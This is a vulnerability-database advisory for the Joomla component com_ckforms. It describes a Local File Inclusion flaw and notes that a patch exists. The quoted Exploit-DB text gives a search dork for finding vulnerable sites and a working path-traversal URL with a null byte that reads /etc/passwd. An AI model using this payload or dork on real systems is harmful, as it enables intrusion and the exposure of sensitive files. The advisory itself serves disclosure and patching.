Joomla Component com_ckforms

vendor:

com_ckforms

by:

altbta

7,5

CVSS

HIGH

Multiple Vulnerabilities

CWE

Product Name: com_ckforms

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Joomla Component com_ckforms

A vulnerability exists in Joomla Component com_ckforms which allows an attacker to perform a Local File Inclusion (LFI) attack. The attacker can send a specially crafted HTTP request to the vulnerable application in order to include a file from the local system. This can be exploited to gain access to sensitive information such as system and application files.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the application.

Source

Exploit-DB raw data:

####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"

http://extensions.joomla.org/extensions/contacts-and-feedback/forms/4939
####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../.
./../../../../../../etc/passwd%00

####################################################################
RxH & ab0-3th4b